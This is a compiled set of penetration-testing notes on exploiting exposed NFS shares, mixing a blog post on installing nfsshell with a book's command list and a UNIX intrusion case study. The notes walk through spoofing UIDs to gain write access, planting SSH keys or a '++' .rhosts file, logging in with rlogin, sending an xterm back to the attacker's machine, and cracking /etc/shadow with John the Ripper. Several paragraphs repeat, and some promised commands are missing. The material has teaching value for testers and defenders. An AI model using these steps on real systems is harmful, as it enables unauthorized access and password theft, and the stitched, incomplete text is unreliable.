Attack to NFS
Download and install nfsshell
Source: http://www.perspectiverisk.com/blog/2013/03/nfsshell-installation/
Pop open a terminal and input the following commands:
Some important points:
(after export command) and the system denies you, then you can do "uid 1000" where 1000 is the user id of the file listed when ls -l. In this way you can access the share content
If you want to pwn the machine you should be able to write in the target's home folder. Sometimes you might be required to run nfsshell with root privileges. To perform the attack you need to generate the ssh key and copy the public one on the share using the "upload" functionality provided by nfsshell.
after that you can run
to login in the target.
When SSH is not in use you can use rlogin. In this case you need to upload a file called .rhosts which if cat it contains "++"
after that run the command
Exploitation via mount option in linux
Source: http://www.perspectiverisk.com/blog/2013/03/nfsshell-installation/
NFSShell is neat little tool that allows user level access to an NFS server and its NFS shares. It can be used by penetration testers to exploit known issues with the NFS Service typically associated with the port 2049/tcp. A whole host of vulnerabilities are associated with an NFS share being exposed.
The screenshot below shows several simple steps I took to view an NFS share available to mount on the 192.168.0.16 host. I then used the NFSShell tool to export and mount the shares to view the files hosted on the exposed share.
If you have ever Googled for instructions on how to install NFSShell on Ubuntu you might have noticed there aren’t a lot of references on how to do this easily. I found a small number of references online that provide installation instructions but they didn’t work well for me, although I was able to use them as a starting point. With a bit of tweaking this is what worked for me:
The screenshot below shows several simple steps I took to view an NFS share available to mount on the 192.168.0.16 host. I then used the NFSShell tool to export and mount the shares to view the files hosted on the exposed share.
If you have ever Googled for instructions on how to install NFSShell on Ubuntu you might have noticed there aren’t a lot of references on how to do this easily. I found a small number of references online that provide installation instructions but they didn’t work well for me, although I was able to use them as a starting point. With a bit of tweaking this is what worked for me:
Platforms tested:
- Ubuntu 12.04 32bit
- Backtrack 5 R3 32bit.
Pop open a terminal and input the following commands:
Changing some text in the Makefile
Before you can run the make file and install NFSShell you need to make some changes. In your terminal enter:
Comment the four lines following:
Then, uncomment the 3 lines following:
To complete the process run the newly amended make file by entering the following into your terminal window:
Provided there are no errors, you have successfully compiled NFSShell. To test to see if your tool is working, type the following in your terminal whilst inside the nfs folder:
Exploitation via NFSSHELLSome important points:
ls -l
tells you the owner ids of the share (folders). if you try to docd myshare
(after export command) and the system denies you, then you can do "uid 1000" where 1000 is the user id of the file listed when ls -l. In this way you can access the share content
If you want to pwn the machine you should be able to write in the target's home folder. Sometimes you might be required to run nfsshell with root privileges. To perform the attack you need to generate the ssh key and copy the public one on the share using the "upload" functionality provided by nfsshell.
after that you can run
ssh root@target
to login in the target.
When SSH is not in use you can use rlogin. In this case you need to upload a file called .rhosts which if cat it contains "++"
echo "++" > .rhosts
after that run the command
rlogin -l
Exploitation via mount option in linux
A similar attack in NFS can be done by mountin the share as follows:
sudo mount -o soft,intr,rsize=8192,wsize=8192 :/ /mnt/tmp2/
Other useful links:
mount -t nfs 192.168.1.112:/ /mnt -o nolock
NFS is predominately insecure in its implementation. System admins are sometimes under pressure to get things done and its easy setting up an NFS share and offering out to the default (everyone)! A more secure format would be to assign hostnames/ IP addresses or utilises some sort of TCP wrapper for access to the NFS shares i.e.
Export list for 192.168.0.1:
/export/goodstuff workstn1,workstn2
Any attempt then to try and mount these shares remotely returns:
failed, reason given by server: Permission denied
Additional information
From the book: http://hackbbs.org/article/book/Hack%20IT%20Security%20Through%20Penetration%20Testing.pdf
9.6.4 nfsshel
URL: ftp://ftp.cs.vu.nl/pub/leendert
Description: The nfsshell tool is essentially a client that can access NFS servers over
either TCP or UDP. This tool is helpful in testing and verifying the existence of potential
exposures in NFS servers. The source code is available as freeware and has been tested
on several UNIX variants, including AIX, DEC, SunOS, and Linux (including Red Hat 5).
Usage: nfsshell is a straightforward, easy-to-use command line tool with numerous
options that works much like an FTP client. It allows remote connection to an NFS server in
much the same way an FTP client remotely connects to an FTP server. The following command allows you to access the client:
nfs
At this point, the prompt should change to the following:
nfs>
From here, the help command brings up a list of available commands, many of which will
be familiar, including the cd, uid, get, and put commands that allow a user to change the
directory, change the user ID, get a file from the remote host, and put a file onto the remote
host, respectively. The complete list, taken from the help documentation, follows.
host —set remote host name
uid [ []]—set remote user ID
gid []—set remote group ID
cd []—change remote working directory
lcd []—change local working directory
cat —display remote file
ls [-l] —list remote directory
get —get remote files
df— —file system information
rm —delete remote file
ln —link file
mv —move file
mkdir —make remote directory
rmdir —remove remote directory
chmod —change mode
chown [.] —change owner
put []—put file
mount [-upTU] [-P port] —mount file system
umount—umount remote file system
umountall—umount all remote file systems
export—show all exported file systems
dump —show all remote mounted file systems
status —general status report
help —this help message
quit —it's all in the namebye—good-bye
handle []—get/set directory file handle
mknod [b/c major minor] [p] —make device
More interesting commands include the host command that initiates a
connection to the specified target (using either its host name or IP address). The export
command then lists the target's export list. These files or directories can be mounted with
the mount command
--
Case Study: UNIX Penetration
During an internal penetration test we found some interesting services running on a UNIX
system at IP address 10.10.10.10. Our Nmap port scan (using the command shown below)
revealed that NFS (port 2049) and rlogin (port 513) were running on the target system.
Nmap's operating system detection also revealed that the operating system was Red Hat
6.1. We determined that we might be able to exploit NFS and rlogin to gain access to the
system.
# nmap –sT –O 10.10.10.1-254
First we needed to determine what information was available from NFS. We issued the
command:
# showmount –e 10.10.10.10
This command returned the information that users' home directories were exported. Using
the mount command we mounted a user's home directory, which we will call user1.
Since rlogin was also running on the server, we could attempt to establish a trust
relationship so that we could log in to the system with no password. A .rhosts file in a
user's home directory specifies what systems are trusted and allows users from those
hosts to log in with no password. Therefore, if we could create a .rhosts file in the user1
home directory and add an entry to allow it to trust our system, we could log in with no
password.
Unfortunately, the mounted file system was not writable. We attempted to use nfsshell to
get around this problem. Using nfsshell, we attempted to change the UID to “1” on the
mounted file system to give us write access. This is done by simply specifying the UID
value in the nfsshell client:
nfs> uid 1
Using the status command we verified that the UID was changed.
Now that we had write access to the file system, we could create a .rhosts file. Adding a
"++" to the .rhosts file causes the target to trust any user on every system. We issued the
following command to create the .rhosts file in the user1 home directory.
# echo ++ >.rhosts
Now we could log in to the system as user1:
# rlogin –l user1 10.10.10.10
Now we were logged in as user1. We wanted to elevate our privileges to root. To help us
achieve this, we sent an Xterm back to our system. On our system we issued the following
command:
# xhost +10.10.10.10
On the target system, we executed the following command to export the display. The IP
address of our laptop was 10.10.10.100.
xterm -display 10.10.10.100:0.0
Now we had a fully functional Xterm and could execute commands as if we were sitting at
the console. Next, we started to research local buffer overflow attacks that we could use to
elevate our access. Searching Packetstorm we found a local buffer overflow for Red Hat
6.1 that yielded root access. We downloaded an exploit called vixi-crontab. We ran this
exploit and obtained root privileges on the system.
Once we had root we captured the password and shadow password files and cracked
them using John the Ripper.
# unshadow /etc/passwd /etc/shadow > crack.1
# john crack.1
Now we had additional passwords to attempt on other systems